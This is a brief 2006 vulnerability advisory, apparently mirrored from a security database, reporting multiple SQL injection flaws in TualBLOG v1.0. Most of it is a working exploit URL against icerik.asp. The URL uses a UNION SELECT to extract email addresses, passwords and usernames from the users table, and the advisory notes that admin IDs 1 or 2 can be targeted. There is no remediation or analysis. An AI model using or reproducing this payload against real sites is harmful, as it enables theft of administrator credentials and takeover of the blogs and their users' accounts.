TualBLOG v 1.0 multiple sql injection

2006-09-14T00:00:00
ID SECURITYVULNS:DOC:14264
Type securityvulns
Reporter Securityvulns
Modified 2006-09-14T00:00:00

Description

BiyoSecurity.Org

script name : TualBLOG v 1.0

Risk : High

Regards : Dj ReMix

Thanks : Korsan , Liz0zim

Vulnerable file : icerik.asp

exp :

http://site.com/[path]/icerik.asp?icerikno=-1%20union+select+mail,sifre,uyeadi+from+tbl_uye+where+uyeno=1

uyeno = 1 or 2( Admin ID )

Bye :=)